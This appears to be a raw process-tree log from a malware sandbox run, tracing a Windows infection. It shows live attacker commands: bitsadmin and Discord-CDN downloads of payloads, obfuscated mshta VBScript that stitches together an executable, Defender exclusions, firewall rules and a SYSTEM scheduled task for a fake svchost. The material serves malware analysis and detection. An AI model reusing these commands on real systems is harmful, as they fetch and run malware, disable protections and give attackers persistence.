C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\q5lxroat.kpm\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\q5lxroat.kpm\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1634658939 /qn CAMPAIGN=""654"" " CAMPAIGN="654"10⤵
- Enumerates connected drives
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cw2b4zji.es4\any.exe & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\cw2b4zji.es4\any.exeC:\Users\Admin\AppData\Local\Temp\cw2b4zji.es4\any.exe9⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bodhfknq.txo\gcleaner.exe /mixfive & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\bodhfknq.txo\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\bodhfknq.txo\gcleaner.exe /mixfive9⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4288 -s 25210⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ygkltu2n.pb5\autosubplayer.exe /S & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\ygkltu2n.pb5\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\ygkltu2n.pb5\autosubplayer.exe /S9⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl6B89.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl6B89.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl6B89.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl6B89.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl6B89.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl6B89.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl6B89.tmp\tempfile.ps1"10⤵
- Checks for any installed AV software in registry
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z10⤵
- Download via BitsAdmin
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pVs6mDmdY1wodMZO -y x C:\zip.7z -o"C:\Program Files\temp_files\"10⤵
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pKWTDtkOpwTbA5mS -y x C:\zip.7z -o"C:\Program Files\temp_files\"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl6B89.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl6B89.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl6B89.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl6B89.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl6B89.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\MLCgSySS\MLCgSySS.dll" MLCgSySS10⤵
-
C:\Windows\system32\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\MLCgSySS\MLCgSySS.dll" MLCgSySS11⤵
- Drops file in System32 directory
- Drops file in Windows directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl6B89.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl6B89.tmp\tempfile.ps1"10⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl6B89.tmp\tempfile.ps1"10⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl6B89.tmp\tempfile.ps1"10⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsl6B89.tmp\tempfile.ps1"10⤵
-
C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe"C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT10⤵
-
C:\Users\Admin\Pictures\Adobe Films\KhfMcFjZeLr5yaBalfDo9zyX.exe"C:\Users\Admin\Pictures\Adobe Films\KhfMcFjZeLr5yaBalfDo9zyX.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\dEq6aoQFJyDc30_OysF9fzTL.exe"C:\Users\Admin\Pictures\Adobe Films\dEq6aoQFJyDc30_OysF9fzTL.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\Pictures\Adobe Films\AkBj2Qb1oMtZ1Gs927Ft3ji8.exe"C:\Users\Admin\Pictures\Adobe Films\AkBj2Qb1oMtZ1Gs927Ft3ji8.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\5VZS13s3WByVbE4ADMVZQJD5.exe"C:\Users\Admin\Pictures\Adobe Films\5VZS13s3WByVbE4ADMVZQJD5.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\oRqxkgsixdTQLGlCw_wScXlE.exe"C:\Users\Admin\Pictures\Adobe Films\oRqxkgsixdTQLGlCw_wScXlE.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\3⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes3⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes3⤵
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM3⤵
- Creates scheduled task(s)
-
C:\Windows\System\svchost.exe"C:\Windows\System\svchost.exe" formal3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\4⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes4⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes4⤵
-
C:\Users\Admin\Pictures\Adobe Films\iWl5YE6jVqxWhmGtApNhDm2L.exe"C:\Users\Admin\Pictures\Adobe Films\iWl5YE6jVqxWhmGtApNhDm2L.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2744 -s 2603⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\KzQ4K19_9XrJ2mdTwpnysCw4.exe"C:\Users\Admin\Pictures\Adobe Films\KzQ4K19_9XrJ2mdTwpnysCw4.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"3⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Company\NewProduct\inst3.exe"C:\Program Files (x86)\Company\NewProduct\inst3.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\5igv91LvXCMygMPp1mBVXES6.exe"C:\Users\Admin\Pictures\Adobe Films\5igv91LvXCMygMPp1mBVXES6.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\Adobe Films\5igv91LvXCMygMPp1mBVXES6.exe"C:\Users\Admin\Pictures\Adobe Films\5igv91LvXCMygMPp1mBVXES6.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\XBgLhb2BNUFW643gBLl6EQvv.exe"C:\Users\Admin\Pictures\Adobe Films\XBgLhb2BNUFW643gBLl6EQvv.exe"2⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\5A2C.tmp\5A2D.tmp\5A2E.bat "C:\Users\Admin\Pictures\Adobe Films\XBgLhb2BNUFW643gBLl6EQvv.exe""3⤵
-
C:\Users\Admin\AppData\Local\Temp\5A2C.tmp\5A2D.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\5A2C.tmp\5A2D.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\5A2C.tmp\5A2D.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\5A2C.tmp\5A2D.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/901113291861028926/901113305991643206/18.exe" "18.exe" "" "" "" "" "" ""4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\5A2C.tmp\5A2D.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\5A2C.tmp\5A2D.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/901113291861028926/901113363139035156/Transmissibility.exe" "Transmissibility.exe" "" "" "" "" "" ""4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\32034\18.exe18.exe4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\5A2C.tmp\5A2D.tmp\extd.exeC:\Users\Admin\AppData\Local\Temp\5A2C.tmp\5A2D.tmp\extd.exe "" "" "" "" "" "" "" "" ""4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\32034\Transmissibility.exeTransmissibility.exe4⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\0MCyp39H8AxiYTlGcyBfNoUC.exe"C:\Users\Admin\Pictures\Adobe Films\0MCyp39H8AxiYTlGcyBfNoUC.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2912 -s 2483⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\Vo5pWC9v4LM4GIuQjsgwgSyb.exe"C:\Users\Admin\Pictures\Adobe Films\Vo5pWC9v4LM4GIuQjsgwgSyb.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2840 -s 2523⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\Adobe Films\far1gFrhm6HTCSwt7AdHUaXK.exe"C:\Users\Admin\Pictures\Adobe Films\far1gFrhm6HTCSwt7AdHUaXK.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1320 -s 17843⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\G51K2QNgA1moFPDcsqFsEuBz.exe"C:\Users\Admin\Pictures\Adobe Films\G51K2QNgA1moFPDcsqFsEuBz.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\G51K2QNgA1moFPDcsqFsEuBz.exe"C:\Users\Admin\Pictures\Adobe Films\G51K2QNgA1moFPDcsqFsEuBz.exe"3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Pictures\Adobe Films\nGKKAdD43ozQJDv8K6QWTxN0.exe"C:\Users\Admin\Pictures\Adobe Films\nGKKAdD43ozQJDv8K6QWTxN0.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\_HVkO6KridfpAFsxSd4xBRC_.exe"C:\Users\Admin\Pictures\Adobe Films\_HVkO6KridfpAFsxSd4xBRC_.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\_v1u23KhcxVvki0UuinAXhKa.exe"C:\Users\Admin\Pictures\Adobe Films\_v1u23KhcxVvki0UuinAXhKa.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\_v1u23KhcxVvki0UuinAXhKa.exe"C:\Users\Admin\Pictures\Adobe Films\_v1u23KhcxVvki0UuinAXhKa.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\Lmzy936RB1QfVboFo4pd1_Pn.exe"C:\Users\Admin\Pictures\Adobe Films\Lmzy936RB1QfVboFo4pd1_Pn.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\Lmzy936RB1QfVboFo4pd1_Pn.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\Lmzy936RB1QfVboFo4pd1_Pn.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\Lmzy936RB1QfVboFo4pd1_Pn.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\Lmzy936RB1QfVboFo4pd1_Pn.exe" ) do taskkill -im "%~NxK" -F4⤵
-
C:\Users\Admin\AppData\Local\Temp\8pWB.eXE8pWB.eXe /pO_wtib1KE0hzl7U9_CYP5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F7⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ("WSCRIPt.SheLl" ). rUn ("C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl + _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " ,0 , TruE ) )6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl+ _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY7⤵
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"8⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "8⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -y .\N3V4H8H.SXY8⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -im "Lmzy936RB1QfVboFo4pd1_Pn.exe" -F5⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\Ws4KoXUYMhJwpZIH_OOJR6K8.exe"C:\Users\Admin\Pictures\Adobe Films\Ws4KoXUYMhJwpZIH_OOJR6K8.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-37ELN.tmp\Ws4KoXUYMhJwpZIH_OOJR6K8.tmp"C:\Users\Admin\AppData\Local\Temp\is-37ELN.tmp\Ws4KoXUYMhJwpZIH_OOJR6K8.tmp" /SL5="$10278,506127,422400,C:\Users\Admin\Pictures\Adobe Films\Ws4KoXUYMhJwpZIH_OOJR6K8.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-35PMH.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-35PMH.tmp\DYbALA.exe" /S /UID=27104⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
-
C:\Program Files\Windows Media Player\QVDBDFUGTJ\foldershare.exe"C:\Program Files\Windows Media Player\QVDBDFUGTJ\foldershare.exe" /VERYSILENT5⤵
-
C:\Users\Admin\AppData\Local\Temp\cf-dc3df-d88-e8682-9dc82a66a28f0\Vytygydula.exe"C:\Users\Admin\AppData\Local\Temp\cf-dc3df-d88-e8682-9dc82a66a28f0\Vytygydula.exe"5⤵
- Modifies system certificate store
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e66⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8efd346f8,0x7ff8efd34708,0x7ff8efd347187⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2216 /prefetch:27⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 /prefetch:37⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2620 /prefetch:87⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2304 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5388 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1936 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6068 /prefetch:87⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6068 /prefetch:87⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6092 /prefetch:27⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6120 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6136 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4856 /prefetch:17⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2192,1643064514819867972,1706565008937323246,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5948 /prefetch:17⤵
-
